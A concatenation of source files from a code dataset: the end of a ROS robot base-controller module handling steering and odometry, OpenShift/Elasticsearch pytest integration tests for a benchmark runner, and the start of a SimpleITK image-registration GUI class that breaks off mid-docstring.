if servo.lat_label == Servo.RIGHT:
self._encoder_filters[i].set_invert(True)
self._reset_encoders()
# Encoder messages (primarily for debugging)
self._encoders_msg = CurioServoEncoders()
self._encoders_pub = rospy.Publisher('/servo/encoders', CurioServoEncoders, queue_size=10)
self._wheel_encoders = [LX16AEncoder() for i in range(BaseController.NUM_WHEELS)]
# Transform
self._odom_broadcaster = TransformBroadcaster()
def move(self, lin_vel, ang_vel):
''' Move the robot given linear and angular velocities
for the base.
The linear and angular velocity arguments refer to the robot's
base_link reference frame. We assume that the base_link origin
is located at the mid-point between the two middle
(non-steering) wheels.
The velocities and separation of the middle wheels are used to
determine a turning radius and rate of turn. Given this the
velocity and steering angle are then calculated for each wheel.
Parameters
----------
lin_vel : float
The linear velocity of base_link frame [m/s].
ang_vel : float
The angular velocity of base_link frame [rad/s].
'''
# Check for timeout
has_timed_out = rospy.get_rostime() > self._cmd_vel_last_rec_time + self._cmd_vel_timeout
# Calculate the turning radius and rate
r_p, omega_p = turning_radius_and_rate(lin_vel, ang_vel, self._mid_wheel_lat_separation)
rospy.logdebug('r_p: {:.2f}, omega_p: {:.2f}'.format(r_p, omega_p))
# Calculate velocity and steering angle for each wheel
wheel_vel_max = 0.0
wheel_lin_vel = []
steer_angle = []
if omega_p == 0:
# Body frame has no angular velocity - set wheel velocity directly
vel = 0.0 if has_timed_out else lin_vel
wheel_vel_max = math.fabs(vel)
for servo in self._wheel_servos:
wheel_lin_vel.append(vel)
for servo in self._steer_servos:
steer_angle.append(0.0)
else:
for servo in self._wheel_servos:
# Wheel position
id = servo.id
x = servo.position[0]
y = servo.position[1]
# Wheel turn radius
r = math.sqrt(x*x + (r_p - y)*(r_p - y))
# Wheel velocity
sgn = -1 if (r_p - y) < 0 else 1
vel = sgn * r * omega_p
vel = 0.0 if has_timed_out else vel
wheel_vel_max = max(wheel_vel_max, math.fabs(vel))
wheel_lin_vel.append(vel)
# rospy.logdebug("id: {}, r: {:.2f}, wheel_lin_vel: {:.2f}".format(id, r, vel))
for servo in self._steer_servos:
# Wheel position
id = servo.id
x = servo.position[0]
y = servo.position[1]
# Wheel angle
angle = math.atan2(x, (r_p - y))
steer_angle.append(angle)
# rospy.logdebug("id: {}, angle: {:.2f}".format(id, degree(angle)))
# Apply speed limiter - preserving turning radius
if wheel_vel_max > BaseController.LINEAR_VEL_MAX:
speed_limiter_sf = BaseController.LINEAR_VEL_MAX / wheel_vel_max
for i in range(len(wheel_lin_vel)):
wheel_lin_vel[i] = wheel_lin_vel[i] * speed_limiter_sf
# Update steer servos
# @TODO link the time of the move to the angle which the servos turn through
rospy.logdebug('Updating steer servos')
for i in range(BaseController.NUM_STEERS):
servo = self._steer_servos[i]
# Input angles are in radians
angle_deg = degree(steer_angle[i])
# Transition from turning radius outside the base footprint to inside
# (i.e in-place turning)
if angle_deg > BaseController.REVERSE_SERVO_ANGLE:
angle_deg = angle_deg - 180
if angle_deg < -BaseController.REVERSE_SERVO_ANGLE:
angle_deg = 180 + angle_deg
# Map steering angle degrees [-120, 120] to servo position [0, 1000]
servo_pos = int(map(angle_deg * servo.orientation,
-BaseController.SERVO_ANGLE_MAX, BaseController.SERVO_ANGLE_MAX,
BaseController.SERVO_POS_MIN, BaseController.SERVO_POS_MAX))
rospy.logdebug('id: {}, angle: {:.2f}, servo_pos: {}'.format(servo.id, angle_deg, servo_pos))
self._servo_driver.set_steer_command(i, servo_pos)
# Update wheel servos
rospy.logdebug('Updating wheel servos')
for i in range(BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
# Wheel angular velocity
wheel_ang_vel = wheel_lin_vel[i] / self._wheel_radius
# Map speed to servo duty [-1000, 1000]
duty = int(map(wheel_ang_vel * servo.orientation,
-BaseController.SERVO_ANG_VEL_MAX, BaseController.SERVO_ANG_VEL_MAX,
-BaseController.SERVO_DUTY_MAX, BaseController.SERVO_DUTY_MAX))
# Set servo speed
rospy.logdebug('id: {}, wheel_ang_vel: {:.2f}, servo_vel: {}'
.format(servo.id, wheel_ang_vel, duty))
self._servo_driver.set_wheel_command(i, duty)
# Update duty array (needed for servo position classifier)
self._wheel_servo_duty[i] = duty
# Publish the servo command
self._servo_driver.publish_commands()
def set_steer_servo_offsets(self):
''' Set angle offsets for the steering servos.
The offsets are specified in the node parameters are are
adjusted to ensure each corner wheel is centred when the robot
is commanded to move with no turn.
'''
# Set the steering servo offsets to centre the corner wheels
for i in range(BaseController.NUM_STEERS):
servo = self._steer_servos[i]
rospy.loginfo('id: {}, offset: {}'.format(servo.id, servo.offset))
self._servo_driver.set_angle_offset(i, servo.offset)
def stop(self):
''' Stop all servos
'''
rospy.loginfo('Stopping all servos')
for i in range(BaseController.NUM_WHEELS):
self._servo_driver.set_wheel_command(i, 0)
self._servo_driver.publish_commands()
def _cmd_vel_callback(self, msg):
''' Callback for the subscription to `/cmd_vel`.
The callback updates the current command, and also a watchdog
timer so that if cmd_vel messages stop, the motors stop.
Parameters
----------
msg : geometry_msgs.msg/Twist
The message for the commanded velocity.
'''
rospy.logdebug('cmd_vel: linear: {}, angular: {}'.format(msg.linear.x, msg.angular.z))
self._cmd_vel_last_rec_time = rospy.get_rostime()
self._cmd_vel_msg = msg
def _servo_pos_callback(self, msg):
''' Callback for the subscription to `/servos/positions`.
Parameters
----------
msg : curio_msgs.msg/CurioServoStates
The message for the servo positions.
'''
self._servo_pos_msg = msg
def update(self, event):
''' Callback for the control loop.
This to be called at the control loop frequency by the node's
main function, usually managed by a rospy.Timer.
Parameters
----------
event : rospy.Timer
A rospy.Timer event.
See http://wiki.ros.org/rospy/Overview/Time for details.
'''
# Get the current real time (just before this function was called)
time = event.current_real
# Read and publish
self._update_odometry(time)
self._publish_odometry(time)
self._publish_tf(time)
self._publish_encoders(time)
# PID control would go here...
# Write commands
self.move(self._cmd_vel_msg.linear.x, self._cmd_vel_msg.angular.z)
def update_state(self, event):
''' Callback for the status update loop.
This to be called at the status update frequency by the node's
main function, usually managed by a rospy.Timer.
Parameters
----------
event : rospy.Timer
A rospy.Timer event.
'''
# Get the current real time (just before this function
# was called)
time = event.current_real
self._update_state(time)
self._publish_states(time)
def shutdown(self):
''' Called by the node shutdown hook on exit.
'''
# Stop all servos - @TODO add e-stop with latch.
self.stop()
####################################################################
# Odometry related
def _reset_encoders(self):
''' Reset the encoders
'''
# Reset encoder filters
for i in range(BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
pos = self._servo_driver.get_wheel_position(i)
filter.reset(pos)
# @TODO: Gives errors when running at low control loop update rate
# (e.g. < 15Hz).
#
# The error is because the encoder filter is not updated fast enough
# to make two measurements close enough in time either side of a
# discontinuity in the servo position to see a jump of 1000-1400
# counts. Instead the encoder suffers from aliasing. As result the
# odometry will work at low velocities and then suddenly fail as
# it is increased.
#
def _update_all_wheel_servo_positions(self, time):
''' Get the servo positions in radians for all wheels.
Parameters
----------
time : rospy.Time
The current time.
Returns
-------
list
A list of 6 floats containing the angular position
of each of the wheel servos [rad].
'''
servo_positions = [0 for i in range(BaseController.NUM_WHEELS)]
msg = 'time: {}, '.format(time)
for i in range (BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
# Calculate the encoder count
duty = self._wheel_servo_duty[i]
pos = self._servo_driver.get_wheel_position(i)
filter.update(time, duty, pos)
count = filter.get_count()
theta = filter.get_angular_position()
servo_positions[i] = theta
# Append to debug message
msg = msg + "{}: {}, ".format(servo.id, count)
rospy.loginfo(msg)
return servo_positions
def _update_mid_wheel_servo_positions(self, time):
''' Update the servo positions in radians for the
left and right mid wheels.
Parameters
----------
time : rospy.Time
The current time.
Returns
-------
list
A list of 2 floats containing the angular position
of the left and right mid wheel servos [rad].
'''
# @TODO: resolve hardcoded index
left_pos = self._update_wheel_servo_position(time, 1)
right_pos = self._update_wheel_servo_position(time, 4)
servo_positions = [0 for i in range(2)]
servo_positions[Servo.LEFT] = left_pos
servo_positions[Servo.RIGHT] = right_pos
rospy.logdebug("time: {}, left: {}, right: {}".format(time, left_pos, right_pos))
return servo_positions
def _update_wheel_servo_position(self, time, i):
''' Update the servo positions in radians for the i-th wheel.
Parameters
----------
time : rospy.Time
The current time.
i : int
The index of the i-th wheel.
Returns
-------
float
The angular position of the wheel servo [rad].
'''
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
# Calculate the encoder count
duty = self._wheel_servo_duty[i]
pos = self._servo_driver.get_wheel_position(i)
filter.update(time, duty, pos)
count = filter.get_count()
theta = filter.get_angular_position()
return theta
def _init_odometry(self):
''' Initialise the odometry
Initialise the time independent parameters of the
odometry message.
'''
odom_frame_id = 'odom'
base_frame_id = 'base_link'
pose_cov_diag = [0.01, 0.01, 0.01, 0.01, 0.01, 0.01]
twist_cov_diag = [0.01, 0.01, 0.01, 0.01, 0.01, 0.01]
self._odom_msg.header.frame_id = odom_frame_id
self._odom_msg.child_frame_id = base_frame_id
self._odom_msg.pose.pose.position.y = 0.0
self._odom_msg.pose.covariance = [
pose_cov_diag[0], 0., 0., 0., 0., 0.,
0., pose_cov_diag[1], 0., 0., 0., 0.,
0., 0., pose_cov_diag[2], 0., 0., 0.,
0., 0., 0., pose_cov_diag[3], 0., 0.,
0., 0., 0., 0., pose_cov_diag[4], 0.,
0., 0., 0., 0., 0., pose_cov_diag[5]
]
self._odom_msg.twist.twist.linear.y = 0.0
self._odom_msg.twist.twist.linear.z = 0.0
self._odom_msg.twist.twist.angular.x = 0.0
self._odom_msg.twist.twist.angular.y = 0.0
self._odom_msg.twist.covariance = [
twist_cov_diag[0], 0., 0., 0., 0., 0.,
0., twist_cov_diag[1], 0., 0., 0., 0.,
0., 0., twist_cov_diag[2], 0., 0., 0.,
0., 0., 0., twist_cov_diag[3], 0., 0.,
0., 0., 0., 0., twist_cov_diag[4], 0.,
0., 0., 0., 0., 0., twist_cov_diag[5]
]
def _publish_odometry(self, time):
''' Populate the nav_msgs.Odometry message and publish.
Parameters
----------
time : rospy.Time
The current time.
'''
# rospy.loginfo('x: {:.2f}, y: {:.2f}, heading: {:.2f}, lin_vel: {:.2f}, ang_vel: {:.2f}'
# .format(
# self._odometry.get_x(),
# self._odometry.get_y(),
# self._odometry.get_heading(),
# self._odometry.get_lin_vel(),
# self._odometry.get_ang_vel()))
quat = quaternion_from_euler(0.0, 0.0, self._odometry.get_heading())
self._odom_msg.header.stamp = time
self._odom_msg.pose.pose.position.x = self._odometry.get_x()
self._odom_msg.pose.pose.position.y = self._odometry.get_y()
self._odom_msg.pose.pose.orientation.x = quat[0]
self._odom_msg.pose.pose.orientation.y = quat[1]
self._odom_msg.pose.pose.orientation.z = quat[2]
self._odom_msg.pose.pose.orientation.w = quat[3]
self._odom_msg.twist.twist.linear.x = self._odometry.get_lin_vel()
self._odom_msg.twist.twist.angular.z = self._odometry.get_ang_vel()
self._odom_pub.publish(self._odom_msg)
def _update_odometry(self, time):
''' Update odometry
This is the same calculation as used in the odometry
for the ackermann_drive_controller.
Parameters
----------
time : rospy.Time
The current time.
'''
# Get the angular position of the all wheel servos [rad] and
# update odometry
# wheel_servo_pos = self._update_all_wheel_servo_positions(time)
# self._odometry.update_6(wheel_servo_pos, time)
# Get the angular position of the mid wheel servos [rad]
# and update odometry
wheel_servo_pos = self._update_mid_wheel_servo_positions(time)
self._odometry.update_2(wheel_servo_pos, time)
def _publish_tf(self, time):
''' Publish the transform from 'odom' to 'base_link'
Parameters
----------
time : rospy.Time
The current time.
'''
# Broadcast the transform from 'odom' to 'base_link'
self._odom_broadcaster.sendTransform(
(self._odometry.get_x(), self._odometry.get_y(), 0.0),
quaternion_from_euler(0.0, 0.0, self._odometry.get_heading()),
time,
'base_link',
'odom')
# @IMPLEMENT
def _update_state(self, time):
''' Update the rover's status
Parameters
----------
time : rospy.Time
The current time.
'''
pass
# @IMPLEMENT
def _publish_states(self, time):
''' Publish the rover's status
Parameters
----------
time : rospy.Time
The current time.
'''
pass
def _publish_encoders(self, time):
''' Publish the encoder state
'''
# Update the encoder messages
for i in range(BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
pos, is_valid = filter.get_servo_pos(False)
msg = self._wheel_encoders[i]
msg.id = servo.id
msg.duty = filter.get_duty()
msg.position = pos
msg.is_valid = is_valid
msg.count = filter.get_count()
msg.revolutions = filter.get_revolutions()
# Publish
self._encoders_msg.header.stamp = time
self._encoders_msg.header.frame_id = 'base_link'
self._encoders_msg.wheel_encoders = self._wheel_encoders
self._encoders_pub.publish(self._encoders_msg)
```
|
{
"source": "jeniferh/benchmark-runner",
"score": 2
}
|
#### File: common/elasticsearch/test_es_operations.py
```python
import pytest
from uuid import uuid4
from benchmark_runner.common.oc.oc import OC
from benchmark_runner.common.elasticsearch.es_operations import ESOperations
from benchmark_runner.common.elasticsearch.elasticsearch_exceptions import ElasticSearchDataNotUploaded
from benchmark_runner.main.update_data_template_yaml_with_environment_variables import delete_generate_file, \
update_environment_variable
from benchmark_runner.benchmark_operator.benchmark_operator_workloads import BenchmarkOperatorWorkloads
from tests.integration.benchmark_runner.test_environment_variables import *
def __generate_pod_yamls():
"""
This method create pod yaml from template and inject environment variable inside
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_pod_template.yaml', environment_variable_dict=test_environment_variable)
def __delete_pod_yamls():
"""
This method delete benchmark_operator
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_pod_exist(pod_name='stressng-pod-workload', namespace=test_environment_variable['namespace']):
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'))
@pytest.fixture(scope="session", autouse=True)
def before_after_all_tests_fixture():
"""
This method is create benchmark operator pod once for ALL tests
:return:
"""
print('Install benchmark-operator pod')
# delete benchmark-operator pod if exist
benchmark_operator = BenchmarkOperatorWorkloads(kubeadmin_password=test_environment_variable['kubeadmin_password'], es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
benchmark_operator.make_undeploy_benchmark_controller_manager_if_exist(runner_path=test_environment_variable['runner_path'])
benchmark_operator.make_deploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
yield
print('Delete benchmark-operator pod')
benchmark_operator.make_undeploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
@pytest.fixture(autouse=True)
def before_after_each_test_fixture():
"""
This method is clearing yaml before and after EACH test
:return:
"""
# before each test
__generate_pod_yamls()
yield
# After all tests
__delete_pod_yamls()
print('Test End')
def test_verify_es_data_uploaded_stressng_pod():
"""
This method verify that the data upload properly to elasticsearch
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
try:
workload = 'stressng-pod'
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name=f'{workload}-workload')
oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
oc.wait_for_ready(label='app=stressng_workload', workload=workload)
oc.wait_for_pod_completed(label='app=stressng_workload', workload=workload)
# system-metrics
if test_environment_variable['system_metrics'] == 'True':
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert es.verify_es_data_uploaded(index='system-metrics-test', uuid=oc.get_long_uuid(workload=workload))
if test_environment_variable['elasticsearch']:
# verify that data upload to elastic search
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert es.verify_es_data_uploaded(index='stressng-pod-test-results', uuid=oc.get_long_uuid(workload=workload))
except ElasticSearchDataNotUploaded as err:
raise err
except Exception as err:
raise err
```
#### File: common/oc/test_oc.py
```python
import time
import pytest
from benchmark_runner.common.oc.oc import OC
from benchmark_runner.common.oc.oc_exceptions import LoginFailed, PodNotCreateTimeout, PodTerminateTimeout, VMNotCreateTimeout, YAMLNotExist
from benchmark_runner.common.elasticsearch.es_operations import ESOperations
from benchmark_runner.main.update_data_template_yaml_with_environment_variables import delete_generate_file, update_environment_variable
from benchmark_runner.benchmark_operator.benchmark_operator_workloads import BenchmarkOperatorWorkloads
from tests.integration.benchmark_runner.test_environment_variables import *
def __generate_pod_yamls():
"""
This method create pod yaml from template and inject environment variable inside
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_pod_template.yaml', environment_variable_dict=test_environment_variable)
def __generate_kata_yamls():
"""
This method create kata yaml from template and inject environment variable inside
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_kata_template.yaml', environment_variable_dict=test_environment_variable)
def __generate_vm_yamls():
"""
This method create vm yaml from template and inject environment variable inside
:return:
"""
update_environment_variable(dir_path=templates_path, yaml_file='stressng_vm_template.yaml', environment_variable_dict=test_environment_variable)
def __delete_pod_yamls():
"""
This method delete pod yamls if exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_pod_exist(pod_name='stressng-pod-workload', namespace=test_environment_variable['namespace']):
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'))
def __delete_kata_yamls():
"""
This method delete kata yamls if exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_pod_exist(pod_name='stressng-kata-workload', namespace=test_environment_variable['namespace']):
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'), pod_name='stressng-kata-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'))
def __delete_vm_yamls():
"""
This method delete vm yamls if exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
if oc._is_vmi_exist(vm_name='stressng-vm-workload', namespace=test_environment_variable['namespace']):
oc.delete_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'), vm_name='stressng-vm-workload')
delete_generate_file(full_path_yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'))
@pytest.fixture(scope="session", autouse=True)
def before_after_all_tests_fixture():
"""
This method is create benchmark operator pod once for ALL tests
:return:
"""
print('Install benchmark-operator pod')
benchmark_operator = BenchmarkOperatorWorkloads(kubeadmin_password=test_environment_variable['kubeadmin_password'],
es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
benchmark_operator.make_undeploy_benchmark_controller_manager_if_exist(runner_path=test_environment_variable['runner_path'])
benchmark_operator.make_deploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
yield
print('Delete benchmark-operator pod')
benchmark_operator.make_undeploy_benchmark_controller_manager(runner_path=test_environment_variable['runner_path'])
@pytest.fixture(autouse=True)
def before_after_each_test_fixture():
"""
This method is clearing yaml before and after EACH test
:return:
"""
# before all test: setup
__generate_pod_yamls()
__generate_kata_yamls()
__generate_vm_yamls()
yield
# After all tests
__delete_pod_yamls()
__delete_kata_yamls()
__delete_vm_yamls()
print('Test End')
###################################################### POD Tests ##################################################
def test_oc_get_pod_name_and_is_pod_exist():
"""
This method test get_pod_name and is_pod_exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc._get_pod_name(pod_name='benchmark-controller-manager', namespace=test_environment_variable['namespace'])
assert oc._is_pod_exist(pod_name='benchmark-controller-manager', namespace=test_environment_variable['namespace'])
def test_yaml_file_not_exist_error():
"""
This method create pod with timeout error
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with pytest.raises(YAMLNotExist) as err:
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng1.yaml'), pod_name='stressng-pod-workload', timeout=-1)
def test_create_sync_pod_timeout_error():
"""
This method create pod with timeout error
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with pytest.raises(PodNotCreateTimeout) as err:
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload', timeout=-1)
def test_delete_sync_pod_timeout_error():
"""
This method delete pod with timeout error
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
with pytest.raises(PodTerminateTimeout) as err:
oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload', timeout=-1)
def test_get_long_short_uuid():
"""
This method test short and long uuid
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
assert len(oc.get_long_uuid(workload='stressng-pod')) == 36
assert len(oc._OC__get_short_uuid(workload='stressng-pod')) == 8
@pytest.mark.skip(reason="Already verified in 'test_es_operations:test_verify_es_data_uploaded_stressng_pod' ")
def test_wait_for_pod_create_initialized_ready_completed_system_metrics_deleted():
"""
This method test wait for pod create, initialized, ready, completed, system-metrics, delete
:return:
"""
workload = 'stressng-pod'
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
assert oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
assert oc.wait_for_ready(label='app=stressng_workload', workload=workload)
assert oc.wait_for_pod_completed(label='app=stressng_workload', workload=workload)
# system-metrics
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_pod.yaml'), pod_name='stressng-pod-workload')
def test_wait_for_kata_create_initialized_ready_completed_system_metrics_deleted():
"""
This method test wait for pod create, initialized, ready, completed, system-metrics, delete
:return:
"""
workload = 'stressng-kata'
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.create_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'), pod_name='stressng-kata-workload')
assert oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
assert oc.wait_for_ready(label='app=stressng_workload', workload=workload)
assert oc.wait_for_pod_completed(label='app=stressng_workload', workload=workload)
# system-metrics
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert oc.delete_pod_sync(yaml=os.path.join(f'{templates_path}', 'stressng_kata.yaml'), pod_name='stressng-kata-workload')
###################################################### VM Tests ##################################################
def test_create_sync_vm_timeout_error():
"""
This method create vm with timeout error
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with pytest.raises(VMNotCreateTimeout) as err:
oc.create_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'), vm_name='stressng-vm-workload', timeout=-1)
@pytest.mark.skip(reason="Already verified in: test_vm_create_initialized_ready_completed_system_metrics_deleted ")
def test_oc_get_vmi_name_and_is_vmi_exist():
"""
This method test get_vmi_name and is_vmi_exist
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc._create_async(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'))
# wait 60 sec till vm will be created
time.sleep(60)
assert oc._get_vmi_name(vm_name='stressng-vm-workload', namespace=test_environment_variable['namespace'])
assert oc._is_vmi_exist(vm_name='stressng-vm-workload', namespace=test_environment_variable['namespace'])
@pytest.mark.skip(reason="Already verified in: test_vm_create_initialized_ready_completed_system_metrics_deleted ")
def test_wait_for_vm_created():
"""
This method wait for vm to be created
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
oc._create_async(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'))
assert oc.wait_for_vm_create(vm_name='stressng-vm-workload')
def test_vm_create_initialized_ready_completed_system_metrics_deleted():
"""
This method test create, get_vmi, initialize, ready, completed, system-metrics, deleted
Must have running ElasticSearch server
:return:
"""
workload = 'stressng-vm'
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.create_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'), vm_name='stressng-vm-workload')
assert oc.get_vmi()
assert oc.wait_for_initialized(label='app=stressng_workload', workload=workload)
assert oc.wait_for_ready(label='app=stressng_workload', workload=workload)
assert oc.wait_for_vm_completed(workload=workload)
# system-metrics
if test_environment_variable['system_metrics'] == 'True':
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert oc.wait_for_pod_create(pod_name='system-metrics-collector')
assert oc.wait_for_initialized(label='app=system-metrics-collector', workload=workload)
assert oc.wait_for_pod_completed(label='app=system-metrics-collector', workload=workload)
assert es.verify_es_data_uploaded(index='system-metrics-test', uuid=oc.get_long_uuid(workload=workload))
if test_environment_variable['elasticsearch']:
es = ESOperations(es_host=test_environment_variable['elasticsearch'],
es_port=test_environment_variable['elasticsearch_port'])
assert es.verify_es_data_uploaded(index='stressng-vm-test-results', uuid=oc.get_long_uuid(workload=workload))
assert oc.delete_vm_sync(yaml=os.path.join(f'{templates_path}', 'stressng_vm.yaml'),
vm_name='stressng-vm-workload')
```
|
{
"source": "JenifferWuUCLA/pulmonary-nodules-SimpleITK",
"score": 3
}
|
#### File: pulmonary-nodules-SimpleITK/Python/gui.py
```python
import SimpleITK as sitk
import matplotlib.pyplot as plt
import ipywidgets as widgets
from IPython.display import display
import numpy as np
from matplotlib.widgets import RectangleSelector
import matplotlib.patches as patches
class RegistrationPointDataAquisition(object):
"""
This class provides a GUI for localizing corresponding points in two images, and for evaluating registration results using a linked cursor
approach, user clicks in one image and the corresponding point is added to the other image.
"""
def __init__(self, fixed_image, moving_image, fixed_window_level= None, moving_window_level= None, figure_size=(10,8), known_transformation=None):
self.fixed_image = fixed_image
self.fixed_npa, self.fixed_min_intensity, self.fixed_max_intensity = self.get_window_level_numpy_array(self.fixed_image, fixed_window_level)
self.moving_image = moving_image
self.moving_npa, self.moving_min_intensity, self.moving_max_intensity = self.get_window_level_numpy_array(self.moving_image, moving_window_level)
self.fixed_point_indexes = []
self.moving_point_indexes = []
self.click_history = [] # Keep a history of user point localizations, enabling undo of last localization.
self.known_transformation = known_transformation # If the transformation is valid (not None) then corresponding points are automatically added.
self.text_and_marker_color = 'red'
# Create a figure with two axes for the fixed and moving images.
self.fig, axes = plt.subplots(1,2,figsize=figure_size)
#self.fig.canvas.set_window_title('Registration Points Acquisition')
self.fixed_axes = axes[0]
self.moving_axes = axes[1]
# Connect the mouse button press to the canvas (__call__ method is the invoked callback).
self.fig.canvas.mpl_connect('button_press_event', self)
ui = self.create_ui()
# Display the data and the controls, first time we display the images is outside the "update_display" method
# as that method relies on the previous zoom factor which doesn't exist yet.
self.fixed_axes.imshow(self.fixed_npa[self.fixed_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.fixed_min_intensity,
vmax=self.fixed_max_intensity)
self.moving_axes.imshow(self.moving_npa[self.moving_slider.value,:,:],
cmap=plt.cm.Greys_r,
vmin=self.moving_min_intensity,
vmax=self.moving_max_intensity)
self.update_display()
display(ui)
def create_ui(self):
# Create the active UI components. Height and width are specified in 'em' units. This is
# a html size specification, size relative to current font size.
self.viewing_checkbox = widgets.RadioButtons(description= 'Interaction mode:',
options= ['edit', 'view'],
value = 'edit')
self.clearlast_button = widgets.Button(description= 'Clear Last',
width= '7em',
height= '3em')
self.clearlast_button.on_click(self.clear_last)
self.clearall_button = widgets.Button(description= 'Clear All',
width= '7em',
height= '3em')
self.clearall_button.on_click(self.clear_all)
self.fixed_slider = widgets.IntSlider(description='fixed image z slice:',
min=0,
max=self.fixed_npa.shape[0]-1,
step=1,
value = int((self.fixed_npa.shape[0]-1)/2),
width='20em')
self.fixed_slider.observe(self.on_slice_slider_value_change, names='value')
self.moving_slider = widgets.IntSlider(description='moving image z slice:',
min=0,
max=self.moving_npa.shape[0]-1,
step=1,
value = int((self.moving_npa.shape[0]-1)/2),
width='19em')
self.moving_slider.observe(self.on_slice_slider_value_change, names='value')
# Layout of UI components. This is pure ugliness because we are not using a UI toolkit. Layout is done
# using the box widget and padding so that the visible UI components are spaced nicely.
bx0 = widgets.Box(padding=7, children=[self.fixed_slider, self.moving_slider])
bx1 = widgets.Box(padding=7, children = [self.viewing_checkbox])
bx2 = widgets.Box(padding = 15, children = [self.clearlast_button])
bx3 = widgets.Box(padding = 15, children = [self.clearall_button])
return widgets.HBox(children=[widgets.HBox(children=[bx1, bx2, bx3]),bx0])
def get_window_level_numpy_array(self, image, window_level):
"""
Get the numpy array representation of the image and the min and max of the intensities
used for display.
"""
npa = sitk.GetArrayViewFromImage(image)
if not window_level:
return npa, npa.min(), npa.max()
else:
return npa, window_level[1]-window_level[0]/2.0, window_level[1]+window_level[0]/2.0
def on_slice_slider_value_change(self, change):
self.update_display()
def update_display(self):
"""
Display the two images based on the slider values and the points which are on the
